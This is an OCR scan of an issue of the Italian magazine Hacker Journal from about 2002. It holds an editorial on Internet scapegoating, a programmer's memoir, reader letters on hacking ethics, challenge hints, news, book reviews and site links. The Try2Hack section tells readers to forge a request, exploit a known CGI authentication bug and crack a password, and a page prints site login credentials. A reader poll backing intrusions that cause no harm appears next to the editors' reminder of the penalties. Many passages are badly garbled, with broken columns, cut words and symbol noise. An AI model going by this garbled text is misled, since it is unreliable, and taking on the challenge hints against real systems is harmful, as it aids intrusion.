
È successo di nuovo. È il più tragico, mo- 
struoso e inconcepibile evento; due bambine 
sono state rapite e uccise in Agosto in Inghil- 
terra. Chi è il mostro? Qualcuno, come al so- 
lito, la spara: Internet, il capro espiatorio 
preferito degli ultimi anni. Holly e Jessica 
frequentavano chatline; avranno conosciuto 
lì l'orco. E giù fiumi di inchiostro a coprire co- 
lonne dei quotidiani: sociologi, massmedio- 
logi, psicologi, tutti a descrivere le nefan- ■ 
dezze della Rete. Poi, la svolta nelle indagi- 
ni: si scopre che in questo caso gli orchi non 
stanno dietro a un computer, ma dietro alla 
cattedra. Sono il bidello e la maestra della I 
scuola elementare frequentata dalle bambi- 
ne. Poco importa: il capro espiatorio preferi- 
to dalla stampa tornerà utile per un'altra 
tragica occasione, magari maturata in real- 
tà dentro alla famiglia o all'oratorio. 

grand@hackerjournal.it 



Lack'er (hàk'ar) 

"Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 
come espandere le loro capacità, a differenza di molti utenti, che preferiscono 
riparare solamente il minimo necessario." 




Strepitoso! 

il_tuo_nome@hackerjournal.it 



Ormai sapete dove e come trovarci, appena 
possiamo rispondiamo a tu tti, anche a que lli 
incazzati. Parola di hacker. 
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I programmatori 

della uecchia guardia 




Non avevo ancora il 
computer quando im- 
parai a programmare. 
Avevo 11 anni ed era il 
1986 quando a mio cu- 
gino fu regalato un MSX. 
Avevo sempre desiderato 
possederne uno, ma... Ahimè! 
A casa mia c'erano spese ben più im- 
portanti e così l'acquisto, di quello che 
tutti consideravano solo un videogio- 
co, non veniva mai preso in considera- 
zione. Così passavo i miei pomerriggi 
estivi a casa sua, mangiando pane e 
Nutella e fissando uno schermo con 
scritto a lettere cubitali "Loading... 
Please wait...". Molti programmi erano 
scritti in linguaggio macchina, altri in 
Basic... 

Naque così il mio interesse per quella 
strana serie di codici. Lettere e nume- 
ri apparentemente indecifrabili, ma 
che sapientemente combinati poteva- 
no aprire le porte della creatività. Ri- 
cordo che litigavo spesso con mio cu- 
gino. Lui voleva solo giocare, lo vole- 
vo capire come funzionava quella 
splendida macchina. Volevo rendermi 
conto se si poteva andare oltre... Alcu- 
ne volte mi lasciava solo a smanettare 
col manuale e così poco alla volta ini- 
ziai a comprendere quella sequenza 
di lettere e numeri. Imparai in fretta e 
altrettanto in fretta sviluppai i miei 
primi programmi in Basic che registrai 
su cassette. Chi sa dove diavolo si tro- 
vano adesso! 

Passò qualche anno e mio cugino com- 
prò un Commodore 64 (Bella creatura 
anche quella!), così il caro vecchio 
MSX mi fu regalato. In breve acquistai 
padronanza anche della nuova mac- 
china sviluppandone del software. 



Quello che per me era solo un gioco 
iniziò a destare la curiosità dei miei 
che mi incoraggiarono nella scelta di 
un tipo di studi adeguato. 
Mi iscrissi a ragioneria con indirizzo 
programmatore. Imparai il Cobol, per- 
fezionai l'analisi e lo sviluppo degli 
algoritmi e... incredibile ma vero... 
venni bocciato al primo anno! L'am- 
metto è stata colpa mia, non avrei mai 
dovuto sputtanare, tutte quelle volte, 
la mia insegnante davanti a tutta la 
classe. Non ne capiva un razzo, fotte- 
va solo i soldi allo Stato. Continuava a 
dire che gli esercizi proposti dal libro 
di testo erano sbagliati, ma io li risol- 
vevo e lei li lasciava sempre incomple- 
ti. Mi vendicai l'anno successivo, 
quando cambiai sezione. 
Riusci comunque a diplomarmi quasi a 
pieni voti! Avrei voluto iscrivermi al- 
l'università ma, dalle mie parti, i figli 
dei camionisti e delle casalinghe non 
sempre riesco a completare gli studi. 
Così mi ritengo fin troppo fortunato se 
sono riuscito a prendere il diploma! 
In seguito non avevo molta voglia di 
fare il militare così frequentai un cor- 
so post-diploma imparando il C+ + . 
Venne comunque il giorno di servire la 
Patria e così parti... Mi diedero l'inca- 
rico di operatore informatico. Tutto 
sommato fu una bella esperienza, la- 
voravo al CED con personale civile 
(Ogni tanto passava anche qualche 
bella fighetta!), ho conosciuto ottimi 
operatori e geniali programmatori dai 
quali ho imparato tantissimo. 
Dopo il congedo mi sono subito rim- 
boccato le maniche e grazie alle mie 
conoscenze informatiche ho sempre 
lavorato. Purtoppo ho avuto a che fa- 
re con disonesti che sfruttavano la mia 



ingenuità di allora. Ricordo che una 
volta ho configurato 3 PC, ho format- 
tati gli HD infestati da virus di vario 
genere, e li ho collegati in rete. Il ti 
to per la modica spesa di 150.000 per 
una giornata di lavoro! Mettendo 
qualcosa da parte, sono così riuscito 
nel 1996 a comprare il Pentium 100 
con il 

In seguito ho sostenuto dei colloqui 
con alcune software house. Stronzi pu- 
re loro! Mi hanno fregato i sorgenti 
dei file di 

sempre usciti con la frase "Cerchiamo 
una figura dinamica, laureata che...". 
Andate in malora, chi diavolo vi cre- 
dete di essere?! 

Conosco lauretati in "Scienze dell'in- 
formazione" che non conoscono la dif- 
ferenza tra un interprete e un compi- 
latore!!! 

righe di codice senza gli appunti del 
professore!!! L'esperienza si matura 
con la pratica, con la passione e con 
l'umiltà! 

Adesso ho 27 anni e faccio il ragionie- 
re in una piccola ditta, amo il mio la- 
voro e non lo cambieri per tutto il pre- 
stigio del mondo. Ho deciso di raccon- 
tare a Voi questa mia storia, perchè 
ritengo le altre riviste sul mercato 
troppo faziose. C'è in giro troppa gen- 
te che non ne capisce una beata sega! 
Stronzi, fighetti, figli di papà che, so- 
lo perchè hanno l'ultimo modello di 
PC, ritengono di capirne qualcosa 
d'informatica. 

Gente che parla di maniera assurda 
"In questa picture le slides..." Ma par- 
late come magiate!!! 

Francesco 



UN GIORNALE PER TUTTI: SIETE NEUJBIE Q UERI HRCKERS? 






MIO HACKING 



Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac- 
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si fa 
per dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo di 
Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co- 
mincia), MIDHACKING (per chi c'è già dentro) e HARDHACKING (per chi man- 
gia pane e worm). 
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SUGLI ARRETRATI ONLINE 

Salve, prima di oggi leggevo su 
internet la vostra rivista trovan- 
dola molto interessante. Oggi ho 
visto che per farlo serviva una pas- 
sword che si trova sulla rivista 
stampata. 



•Puf 



ito che ce l'ho in carne ( 

Mi dispiace, anche perchè nel mio 
paese (Bisceglie,prov. Bari) non ri- 
esco a trovare la vostra rivista. Spe- 



re la rivista on-line vi invio cordiali 
saluti. 

gitetoma 

/ numeri arretrati presenti sul nostro 
sito sono pensati come un servizio in 
più per i nostri lettori, che possono 

imento su un archivio e" 
numeri eventualmente persi, e non 
come una modalità di consultazione 
alternativa all'acquisto in edicola. 
Non c'è bisogno di ricordare che noi 
viviamo solo ed esclusivamente con 
le vendite in edicola: non ci sono 
pubblicità, né palesi né occulte. Ba- 
sta comprare la rivista una sola vol- 
ta e si potrà godere di tutto l'archi- 
vio arretrati per due settimane: mi 
pare un servizio molto conveniente e 
decisamente fuori dal comune (se 
conoscete altri editori che fanno 
qualcosa di simile, fateci un fischio). 

UNA STRANA PUBBLICITÀ 

Un saluto a tutti e complimenti 
per la rivista. 
Sono un vostro fedele lettore e vole- 
vo segnalare un fatto sembratomi 
alquanto strano.... 
Nel TG2 dell'una del primo di ago- 
sto, è stato trasmesso un servizio su 
una banda di "hacker" (come li ha 
definiti il giornalista) che avrebbe 
violato siti (tra cui quello della NA- 
SA) e svolgeva traffici illeciti il 







lamo da .Pillo-kill., e volentieri pubbhc 
:zata in grafica 3d. 



questa immagine 



lestrato dalla pò 



Ora chi ha avuto il piacere, se non 
l'onore, di sfogliare questa rivista 
conosce cosa questa tratta e quali 
sono i suoi "principi", ma, mostran- 
do l'immagine del giornale in un 
servizio non proprio di "cronaca ro- 
sa", cosa avrà pensato la gente "co- 
mune"? 

Non pensate che vi sia stata fatta 
cattiva pubblicità?? 
Secondo me, ciò ha influito molto e 
in senso negativo sull'opinione al- 
trui (io me la sono presa un pò a 
male!!!) 

Qual è la vostra opinione in merito? 
CONTINUATE COSI'!!!!!!!!!! 

Rushkio 

Mah, oltre a Hacker Journal il servi- 



zio riprendeva notebook, masteriz- 
zatori, modem e altri accessori se- 
questrati. Così come i produttori di 
quegli apparecchi non possono ave- 
re alcuna responsabilità per i fatti 
commessi da alcuni stupidi, lo stesso 
vale per la nostra rivista. 

VERGOGNOSO BOICOTTAGGIO? 

Cara redazione di hackerjournal, 
vi scrivo poiché da molti mesi 
sto assistendo ad una antipatico 
quanto vergognoso boicottaggio da 
parte degli internet server provider 
nei confronti di quei siti hacking che 
liberamente esprimono il proprio 
pensiero e mettono a disposizione 
software non conforme ai regola- 
menti dei provider. 
Bisogna ricordare che i virus e i 
software di per sé non sono né buo- 
ni né cattivi: tutto dipende dall'uso 
che se ne fa. Premesso questo, mi 



CORAGGIO DI OSARE: INDI PENDENTI DA TU Ti 



piacerebbe che nei prossimi numeri 
della vostra rivista pubblichereste 
degli articoli su come scaricare soft- 
ware direttamente dai siti senza ve- 
dersi apparire il messaggio che re- 
cita pressappoco cosi: "Pops il soft- 
ware che cercavi non e 1 scaricabile 
in quanto rimosso perche 1 non con- 
forme alla politica di Arianna". 

Mah, sai, un provider privato che ti 
offre spazio gratuito ha tutto il diritto 



di stabilire le regole cnt , 
ni non accettano materiale pornogra- 
fico, altri se la prendono con exploit 
e crack, altri ancora vietano siti dai 
contenuti violenti o razzisti (e non ce 
la sentiamo di dargli torto). Non ti 
piace la policy di un sito di hosting? 
Cercane un altro: il bello di Internet è 
che puoi scegliere tra servizi simili 
sparsi in tutto il mondo. Perché voler 
a tutti i costi buggerare Arianna sca- 
valcando le sue imposizioni? 



TECNICHE DI INTRUSIONE 

~ iao ragazzi, volevo sapere 
^> una cosa visto che voi d hac- 
king ve ne intendete: io volevo 



gitetoma 

Sì, puoi usare un cacciavite. Però 
ti assicuro che lì dentro si sta 
molto stretti. A parte gli scherzi, 



Try2Hack, fate vedere di che pasta siete fatti! 



ITRY^HACK: METTETE ALLA| 
PROVA LA VOSTRA ABILITAI 



A parole siete tutti bravi, ma riuscite ve- 
ramente a passare dei livelli di protezio- 
ne? Dimostratelo al mondo e a voi stessi 
cercando di superare i dieci livelli di dif- 
ficoltà del giochino Try2Hack (che si leg- 
ge "try to hack"), presente sul nostro sito 
www.hackerjournal.it. 
Il gioco consiste nel superare i vari livel- 
li, inserendo ogni volta le password cor- 
rette (oppure arrivando in altri modi alle 
pagine protette da password). 
Per farlo, potreste avere bisogno di alcu- 
ni programmi (Macromedia Flash, Soffi- 
ce, Visual Basic). 

Di tanto in tanto qualche lettore ci scrive 
per dire che alcuni livelli sembrano non 
funzionanare. Noi vi possiamo assicura- 
re invece che tutti quanti funzionano 
esattamente come dovrebbero. 
Chi ha orecchie per intendere... 



Nuova password! 

Ecco i codici per accedere alla Secret Zone 
del nostro sito, dove troverete informazioni 
e strumenti interessanti. Con alcuni browser, 
potrebbe capitare di dover inserire due vol- 
te gli stessi codici. Non fermatevi al primo 
tentativo. 



user: 
pass: 



chin8 
3mendo 




%t%m+ 




M-'f-U" 



■ " 



■ : 



ì wr «Ih'1 ferri -fe- 



F- -!■ I»--. 



Tutto qui, direte voi? Basta fare clic per pas- 
sare al livello successivo? No. Le cose sono 
più complicate di quello che sembra. Per ac- 
cedere alla pagina dove inserire user name 
e password dovrete "falsificare" la richiesta 
di connessione. Poi, bisogna anche inserire 
dati giusti. Sotto. 
LIVELLO 8 

Per passare questo livello bisognerà sfrutta- 
re un baco del Cgi che si occupa dell'autenti- 
cazione. Come prima cosa quindi dovrete 
scoprire quale sia, e poi fare una bella ricer- 
ca per trovare un suo baco famoso. Grazie 
ad esso, troverete il modo di procurarvi un 
nome utente e una password cifrata, da de- 
cifrare con un programma ad hoc. 
LIVELLO 9 

Anche il livello 6 utilizza un proln questo li- 
vello ci si sposta su Ire. Seguendo le istruzio- 
ni fornite, si otterrà una frase da decifrare (il 
metodo è molto, molto semplice). Fatto ciò, 
si otterrà una password da utilizzare per 
collegarsi a un altro canale Ire, dove ci ver- 
rà comunicata una lunuga stringa binaria 



;; zi per poter inserire il proprio nick tra gì 
;-. utenti autorizzati del bot che darà la solu 
E zione per passare al livello 10. 



Mandateci una mail a: try2hack@hackerjournal.it 
scrivendo il numero del livello a cui siete arrivati e le pas- 
sword di tutti i livelli precedenti. Sui prossimi numeri pubbli- 
cheremo l'elenco dei migliori. 
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le tecniche sono svariate, anche 
se bene o male prevedono la pre- 
senza di un servizio di accesso 
remoto di qualche tipo (un server 
telnet o di altro tipo). 

INCONTRI E RADUNI 

Edo un po' di tempo che leggo 
la vostra rivista, naturalmente 
dal primo numero e come pagina 
principale ho quella di HJ. Vorrei 
proporvi, come ogni rivista che 
tratta sull'hacking, di aggiungere 
una nuova sezione, quella ri- 
guardante gli incontri o raduni 
nelle varie località italiane. 
La cosa dovrebbe essere di fon- 
damentale aiuto per tutti quelli 
che vogliono scambiarsi opinioni 



KINGHACK 

Beh, se qualcuno vuole organiz- 
zare incontri, raduni (o le imman- 
cabili pizzate) a sfondo tecnico- 
hackeroso, può mandarci una se- 
gnalazione: inseriremo volentieri 
l'appuntamento nelle news. Una 
sola raccomandazione: la rivista 
viene chiusa dieci giorni prima 
della sua uscita in edicola. Man- 
dateci la mail con un anticipo 
sufficiente. 

IMPRECISIONE SUL N. 6 

Salve gentile redazione di hac- 
ker journal, volevo segnalare 
un errore in un articolo pubbli- 
cato nel numero scorso. L'artico- 
lo (pag. 20) è intitolato "Apriti 
sesamo". Bene, l'autore SN4KE 
dice di proteggere la nostra pas- 
sword per la connessione al no- 
stro provider perchè " durante la 
connessione sembrerà che siamo 
stati noi a connetterci quando in- 
vece è stato lui " , cioè colui che 
ha usufruito del nostro username 
e password per connettersi a in- 



ternet. 




onnett 
nostro provi( 




>£$Wfc> 



Joker ci manda questa immagine a metà strada 
tra l'Uomo Ragno e il maniaco dei giardinetti. 



Quindi se qualcuno di voi inten- 
de far danni a qualche server ( o 
l'ha già fatto ) , con username e 
passwd di un amico, sappia che 
non ha risolto niente, perché 
quando l'admin del server farà 
denuncia al provider e gli comu- 
nicherà l'indirizzo IP da cui pro- 
veniva l'attacco, il provider for- 
nirà all'admin o alle GDF, il nu- 
mero telefonico da cui proveniva 
la chiamata. Quindi attenzione 
prima di seguire istruzioni sba- 
gliate senza accettarsi di ciò che 
è stato scritto. Gentile redazio- 
ne, se sbaglio rispondetemi sulla 
rivista... 

Advanced 



lamata, e non con i username 



Diciamo che l'autenticazione av- 
viene a entrambi i livelli, sia con 
username e password, sia con la 
registrazione del numero di tele- 



Tono [e poi murile cercare di na- 
sconderlo disabilitando la funzio- 
ne di riconoscimento del numero 
chiamante: il dato viene registra- 
to ugualmente dai provider). 
L'articolo però non era inteso a 
dare suggerimenti su come rima- 
nere anonimi, ma su come evitare 
che qualcuno possa rubare il no- 
stro account di accesso per cer- 
care di falsificare la propria 
identità in rete. E un po' come 
quando un criminale fa una rapi- 
na con un'auto rubata; anche se 
perfettamente innocente, il legit- 
timo proprietario ha quanto meno 
delle scocciature. Scocciature 
che è sempre meglio evitare. 

ETICA E MORALE HACK 

\^olevo chiedere ai "grandi geni 
dell' hacking" di cui spesso ho 
letto le mail pubblicate, se a loro 
sarebbe piaciuto, quando erano 
alle prime armi, che qualcuno 
più "bravo" di lui (c'è sempre 
qualcuno + bravo di noi) si di- 
vertisse a entrargli nel PC o a 



Arretrati 

e abbonamenti 



er Journal, che ormai stanno dive 
jgetti da collezione. Stiamo cercar 
ire le strutture necessarie, ma p< 
sere necessario un po' di tempo. I 
>tete trovare i PDF di tutti i veccl 
sul sito nella Secret Zone, e già eh 
I sito, iscrivetevi alla nostra mailin 
e avvisati non appena i servizi < 
?nti e arretrati saranno disponibil 





CORAGG 



fargli crashare il browser; così 
soltanto per dimostrare che lo 
sa fare. 

METTETEVI CON QUELLI DELLA 
VOSTRA TAGLIA!! Cosa volete 
DIMOSTRARE?? Non mi conside- 
ro un hacker, perchè non penso 
di potermi definire tale solo per- 
chè conosco il SU B7! ! 

(oooohh che hacker!), ma 

penso di essere nel giusto quan- 
do affermo che un VERO hacker 
non fa danni solo per farsi nota- 
re, per dimostrare che c'è o che 
"il computer sicuro è solo quello 
spento..." ma per cercare di aiu- 
tare gli altri! 



cne menono a proi 
ie conoscenze a 



come ad esempio 
coloro che entrano nei canali 
IRC di pedofili e non appena 
qualcuno si lascia scappare 
qualcosa — 

Provo invece disprezzo, anzi pe- 
na per coloro che giocherellano 
con internet con il solo scopo di 



p|e|n|d|e|n|t|i| |d|a| 



creare scompiglio o di rompere 
le P***E. In particolar modo non 
comprendo i prima citati "grandi 
geni dell'hacking" che si buttano 
via così, che si sprecano in que- 
sto modo; penso accrescerebbe- 
ro ugualmente la propria fama 
(se è quella che cercano) se cer- 
cassero altre strade e i fini sa- 
rebbero più nobili. 
Spero pubblichiate la mia mail. 
Sono sicuro che non risolverà il 
problema ma forse qualcuno ci 
farà un pensierino. ;) 

PS: vi allego una JPG sul lavoro 
che dovrebbero fare i lamer 

gandalf86 



Hai tutta la nostro comprensione 
e solidarietà, gondolf86. Per 



quanto 



riguarda, quelli ci 



fanno cose come quelle che de- 



scrivi non sono 



non saranno 



mai u geni dell'hacking 1 




IJ.S** 



Secondo (e, qntrar* 
abu^vamenta ki un tettami ér 

Giusto, *e rran ^^^^ 

il danneggia i^^HI 40, 0% 

nulla 

Giusto x ti 

avvi» ^^^^ 

l'arnrnhnirtralprr^^^H 392% 

dckin ralla dJ 

^cure/za i 

Sbagliata 
■antimi 

Sempre giusti» ■ ft,5% 
voli Taiall: 31 14 

A partire da questo numero abbiamo deciso di 
fare un po' più sul serio con il sondaggio presen- 
te sul sito: abbiamo lasciato da parte i quesiti 
sulla distribuzione Linux più fica o sul browser 
migliore, per affrontare temi di cui spesso non si 
parla in pubblico. A quanto pare, la cosa piace 
anche a voi, visto che avete votato in tanti (31 1 4, 
più del doppio dei precedenti sondaggi). 
La stragrande maggioranza dei lettori che han- 
no risposto (80%), ritiene che è lecito entrare 
abusivamente in un sistema se non si danneg- 
gia nulla o se si avverte l'amministratore della 
falla di sicurezza che ha permesso la violazione. 
Saremmo curiosi di sapere in quanti avrebbero 
risposto allo stesso modo se la domanda fosse 
stata posta in senso inverso, e cioè "ritieni che sia 
giusto che altri possano penetrare nel tuo com- 
puter, se non danneggiano nulla o se ti avvisano 
della falla di sicurezza? 11 . Siete proprio sicuri che 
non avreste problemi se qualcuno si mettesse a 
leggere i vostri file personali, o sbirciasse tra le 
foto delle vostre vacanze? (O nella "collezione" 
che avete in quella cartella nascosta?) 
Considerazioni etiche a parte, ricordate comun- 
que che, per la legge, entrare abusivamente in 
un sistema altrui è sempre un reato penale (art 
61 5 ter del Codice Penale), punibile con pene fi- 
no a tre anni di prigione se non si danneggia 
nulla, fino a cinque anni se oltre alla violazione 
c'è anche distruzione o cancellazione di dati, e 
da tre a otto anni se si attaccano sistemi relativi 
alla sicurezza pubblica o alla sanità o alla prote- 
zione civile o comunque di interesse pubblico. 
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CLAMOROSO: 
LA CASA BIANCA ISTIGA 
GLI HACKER 

Durante il suo intervento al raduno hacker 
Black Hat Security di Las Vegas, il consi- 
gliere della Casa Bianca Richard Clarke ha 
accusato pesantemente l'industria del soft- 
ware per i numerosi bachi che infestano i 
programmi. E non si è limitato a questo: ri- 
volgendosi alla platea, ha invitato gli hacker 
a continuare a ricercare bachi e falle nella si- 
curezza di software e sistemi, avvisando poi 
i produttori affinché ci mettano la solita top- 
pa (o le strutture governative se questi, co- 
me spesso accade, non ci sentono molto da 
quell'orecchio). Qualcuno ha obiettato che le 
software house non devono contare sul la- 
voro (gratuito) degli hacker per risolvere i 
propri problemi, ma che devono farlo in pri- 
ma persona. Gli animi si sono nuovamente 
rasserenati quando Clarke ha duramente cri- 
ticato quelle software house che biasimano 
(o addirittura querelano) quegli hacker che 
individuano i bachi e informano la comunità 
informatica dei rischi relativi, ej 



O AGGIORNAMENTO 
SICUREZZA AAAC OS X 

Al 2 agosto Apple ha rilasciato un importan- 
te update per migliorare la sicurezza di 
Mac OS X. I moduli che sono stati modifica- 
ti sono Apache, OpenSSH, OpenSSL, 
SunRPC e mod_ssl. 

L'aggiornamento richiede la presenza della 
versione 10.1.5 di Mac OS X e si può instal- 
lare automaticamente tramite l'utility Soft- 
ware Update del sistema, m 



O OPENOFf ICE 
ANCORA PIÙ APERTO 

i yiccogliendo le richieste avanzate dalla 
Impropria comunità di sviluppatori open 
source, Sun Microsystems ha modificato le 
proprie licenze riguardanti lo sviluppo del co- 
dice e della documentazione per Open Offi- 
ce. Tutto il codice sorgente sarà licenziato 
sotto la GNU Lesser General Public License 
(LGPL) e la Sun Industry Standards Source 
License (SISSL); agli sviluppatori che offri- 
ranno porzioni di codice verrà garantito il 
mantenimento della paternità del proprio 
prodotto. « 



O PGP E VIVO E LOTTA INSIEME A NOI! 



□ 




^^^^^^^^* IIHIWÉIIII 

mi *■ 



Da molto tempo il più celebre programma di 
cifratura per PC, Pretty Good Privacy (PGP 
per gli amici) sembrava destinato a non riceve- 
re aggiornamenti. Network Associates 
(www.nai.com), che lo aveva acquistato nel 97, 
dopo aver sfruttato la tecnologia alla base di 
PGP per alcuni prodotti della linea McAfee, ave- 
va posto uno stop allo sviluppo del programma 
(l'ultima major release di PGR la 7, risale al set- 
tembre 2000). Nemmeno l'uscita di come Win- 
dows XP o Mac OS X, sembrava stimolare la 
realizzazione di una nuova versione ad hoc per 
questi nuovi sistemi operativi. 
Il 1 9 agosto scorso però si è intravista una luce 
di speranza: Network Associates ha infatti ce- 
duto tutti i prodotti PGP alla neonata PGP Cor- 



p o r a t i o n 
(www.pgp.com), 
fondata per l'occasio- 
ne da alcuni manager 
che avevano in pas- 
sato lavorato allo svi- 
luppo e alla commer- 
cializzazione di PGP. Il 
programma quindi 
non è più un prodotto 
marginale di un'azien- 
da che ha ben altri in- 
teressi nel campo de- 
gli antivirus, come 
McAfee, ma il pro- 
dotto di punta di un'a- 
zienda più piccola ma 
più motivata. I risul- 
Ltl tati non si sono fatti 

**_ attendere, e PGP Cor- 

poration ha annun- 
ciato il rilascio della versione 8 di PGP, che sarà 
compatibile anche con Windows XP e Mac OS 
X, e includerà nuove funzionalità come il sup- 
porto di Lotus Notes (per Windows) e la possi- 
bilità di leggere e scrivere volumi creati con 
PGPDisk su piattaforme differenti. 
Due tra gli annunci fatti da PGP Corporation so- 
no particolarmente graditi: il primo è che il codi- 
ce sorgente delle nuove versioni continuerà a 
essere rilasciato pubblicamente, per permettere 
una revisione del codice (unica vera garanzia 
contro eventuali backdoor inserite dal produtto- 
re per favorire governi o aziende); il secondo an- 
nuncio gradito è che continuerà a essere distri- 
buita una versione gratuita di PGP, per uso non 
commerciale. « 



O PC SMILE FINALMENTE E IN EDICOLA! 



□ 



Doveva essere in edicola il 12 agosto ma ha ritar- 
dato qualche giorno... 
Ma ora è finalmente arrivata la rivista più divertente 
dell'anno! Correte in edicola a comprare PC Smile, la 
nuova rivista, con un Cd-Rom in regalo pieno zeppo di 
filmati divertentissimi, giochi realizzati in 
Flash, finti virus (da usare con attenzione! ), ^ 

immagini sexy e vignette umoristiche da % 
utilizzare come sfondo del desktop o da 
inviare agli amici. PC Smile è utilizzabile 
sia dagli utenti Mac, sia da quelli Windows. 




Scriveteci cosa ne pensate ! 
Nell'ultima pagina di Hacker Journal trovate un 
buono sconto di 1 Euro per l'acquisto del primo nu- 
mero di PC Smile! « 



SuàU 



"MICROSOFT HA MIGLI 
BILL LABEN HA MIGLIO! 
AEREOPORT I " 



) L'OPEN SOURCE, COME 
) LA SICUREZZA NEGLI 

> Eric S. Raymond 
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O BUGTRAQ SI VENDE A SYMANTEC! 



□ 



/n Luglio Symantec ha acquisito per circa 
75 milioni di dollari SecurityFocus 
(www.securityfocus.com), l'azienda che 
pubblica Bugfraq, la mamma di tutte le 
newsletter sulla sicurezza informatica, nata 
nel remoto 1993. La notizia non è stata pre- 
sa molto bene dai lettori della newsletter, e 
anche da alcuni dirigenti di Security Focus, 



che pare stiano per la- 
sciare l'azienda. La paura 
è che, nonostante le ras- 
sicurazioni a riguardo, 
Symantec possa modifi- 
care la linea editoriale di 
BugTraq, tradizionalmen- 
te orientata al "full dis- 
closure" (cioè alla pub- 
blicazione di tutte le in- 
formazioni su bachi ed 
exploit), o che addirittu- 
ra Symantec possa cen- 
surare o manipolare in- 
formazioni per promuo- 
vere i propri prodotti relativi alla sicurezza, o 
per non danneggiare l'immagine di importan- 
ti partner (per esempio uno, che ha sede a 
Redmond, produce sistemi operativi e passa 
a Symantec informazioni vitali per la produ- 
zione dei popolari antivirus. Insomma, il tema 
del conflitto di interessi non riguarda soltan- 
to l'Italia... m 



O WARDRIVINGALVOLO 



□ 



||n paio di numeri fa abbiamo parlato 
(/del wardriving la pratica che consiste 
nel mettersi al volante di un auto con un 
portatile dotato di connessione wireless, 
e andare in giro per 
la città cercando 
punti di accesso 
senza protezioni di 
sicurezza. Ebbene, 
alcuni membri del 
b I o g 
www.e3.com.au, 
che si occupa di re- 
ti wireless, hanno 
spinto il concetto 
un po' più in la, o 
meglio, un po' più 
in alto. Sorvolando 
la città di Perth con 
un piccolo aereo- 
piano, alla quota di 
50 metri, hanno tro- 
vato 92 basi di ac- 
cesso sprotette in 
un colpo solo. Per 
l'esperimento sono 
stati usati un pal- 
mare Compaq Ipaq 



con antenna esterna e il programma 
Netstumbler, e un notebook Toshiba Te- 
cra 9000 con antenna incorporata e il 
programma Kismet. Ei 




C3 HACKER DIARI ES 
CONFESSIONI 
DI GIOVANI 
HACKER 



cs 



Autore: Dan Verton 
ISBN: 88-386-4283-4 
Pagine: 272 

Prezzo: €15,00 
Editore: 

McGraw-Hill 



MCKB 



yi prima vista, il libro 
r\ parrebbe rivolgersi a chi vuole farsi un'idea 
del mondo dell'hacking. Il comunicato stampa 
del libro infatti promette: "Entrerai nel mondo del- 
la caccia internazionale ai pirati della cibernetica 
e nella mente degli adolescenti hackers". In que- 
sta dichiarazione, il tradizionale accoppiamento 
hacker = criminali non fa presagire molto di buo- 
no. Andando a spulciare però, si possono trova- 
re interessanti informazioni sulla storia dei più 
eclatanti attacchi degli ultimi anni, parecchie in- 
terviste ad agenti dell'FBI, psicologi criminali, 
agenti di pubblica sicurezza e anche ad hacker, 
in attività e non. m 

ea LINUX MUSICA 
E SUONI 



Autore: Dave Phillips 
ISBN: 88-8378-020-5 
Pagine: 480 
Prezzo: € 29,95 
Editore: Hops Libri 




Hv)3!C«SW0« 



Che vogliate risolvere pro- 
blemi nella trattazione del- 
l'audio da parte del pinguino, o trasformare la vo- 
stra Linux box in uno studio di registrazione mu- 
sicale, questo è il libro che fa per voi. Linux Mu- 
sica & Suoni offre un'approfondita introduzione 
per cominciare a registrare, archiviare e suonare 
musica con il sistema operativo Linux. 
Gli argomenti trattati sono: 

- registrare, mixare e aggiungere effetti musicali 

- lavorare con file Mod, Midi e Mp3 

- archiviare e masterizzare brani 

- utilizzare software di sintetizzazione musicale 
come Csound 

- impostare il sistema per condividere le risorse 
musicali del PC 

- trasmettere dal vivo su Internet 

Per ogni argomento, vengono presentate le ap- 
plicazioni relative. Al libro è associato anche un 
sito Web, zeppo di risorse e link utili, m 
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HJ ha surf ato per voi . . 




www.robertgraham.com/pubs/ 
hacking-dict.html 
Istruttivo dizionario del gergo 
hacker, che accanto alla 
definizione tecnica delle varie 
parole elencate, descrive anche il 
loro significato nella cultura 
hacker (per esempio, si da la 
definizione del file virtuale 
/dev/null ma si dice anche in 
frasi come "Se non ti piace quello 
che faccio, manda pure i tuoi 
commenti in /dev/null). Meritano 
una visita anche i livelli 
superiori, dove si trovano 
informazioni sullo sniffing e una 
raccolta di consigli e aneddoti 
sulle visite ai siti porno durante 




1 5 minuti di celebrità! Questi sono i vostri 



-. r 



VIRUS ED 2 



www.virused2.too.it 

lo sono VIRUSED2 e ho 20 anni. Vi chiedo di pubblicare il mio 
sito sulla vostra rivista. Vi assicuro che farà un figurone sulle 
vostre pagine . 
Ciao a tutti e... COMPLIMENTI !!! 

..:: VIRUSED2 ::.. 



- Bill J—*JJI 



Qualcuno sente la mancanza dei teschi? 



www.sOftpj.org 

Butchered form Inside (BFi per 
gli amici) è una storica ezine ita- 
liana. Il livello qualitativo è mol- 
to elevato, sia sul piano tecnico, 
sia su quello editoriale: anche la 
lettura di articoli su argomenti 
tecnici e tutto sommato noiosi, si 
può rivelare molto divertente. 
Ultimamente ha fatto parlare 
molto di sé per la pubblicazione 
di articoli sul funzionamento 
della rete Fastweb, completi di 
programmi per superare alcuni 
limiti tecnici del provider a larga 
banda. 
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www.spysystem.it 

Vorrei mettere il link 
del mio sito su HAC- 
KER JOURNAL. 
Il mio sito parla di si- 
curezza, perché per 
essere al sicuro devi 
prima conoscere le 
tecniche hacker. 

Grazie 1000 

Non sono forse due 
modi di vedere la 
stessa cosa? 
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siti; scegliete voi se tirarvela o vergognarvi 
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www.wizard4.cjb.net 

Ciao, 

volevo chiedervi se po- 
tevate inserire nella ri- 
vista il link al mio sito. 
Grazie! 

Ciao by 
wizard4 



i i.ii'ifi 
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http://solitaireknight.supereva.it 

Vi sarei grato se pubblicaste il link del 
mio sito, un sito dove poter trovare di tut- 
to, e quello che non c'è basta chiederlo. 

Tabbo80 

Posso chiedere anche una margherita e 
una media chiara? 







*i 



Benvenuti sul sita dì LUPINI 

■ i -_-,fii-.| - 
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www.lupin3rd.org 



Ecco il sito che voglio segnalare a tutti i costi. 



Matrox 



Per il costo possiamo senz'altro metterci d'accordo. 

Però... quel sondaggio sul miglior film riguardante ihacking io 

da qualche parte /'fio già visto. Mah? 




http://virgolamobile.50megs.com/ 
hacker-howto-it.html 
Se cercate info su dove recuperare 
exploit, crack e seriali, avete sba- 
gliato indirizzo. Se invece volete 
